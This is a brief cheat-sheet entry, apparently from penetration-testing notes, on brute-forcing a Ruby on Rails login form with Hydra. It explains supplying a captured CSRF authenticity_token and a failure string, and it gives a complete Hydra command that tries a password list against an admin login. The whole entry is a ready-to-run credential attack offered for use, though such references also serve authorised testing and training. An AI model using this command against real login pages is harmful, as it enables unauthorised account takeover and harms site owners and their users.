Rails Login Brute Force (Hydra)
credentialstool
Summary
Brute-forces a Rails login form with Hydra; the CSRF authenticity_token must be captured and supplied, and F= marks the failure string.
Walkthrough
Use Hydra against a Ruby on Rails login form when you have a candidate username and a password list.
Steps
- Capture a valid
authenticity_token(CSRF token) from the login page and substitute it into the request. - Identify the failure string returned on a bad login (here
Invalid) and pass it withF=. - Run the attack with
-lfor a fixed user and-Pfor the password list.
Commands
bash
hydra -l admin -P passwords.txt <TARGET> http-post-form "/admin/login:authenticity_token=TOKEN&user[username]=^USER^&user[password]=^PASS^:F=Invalid"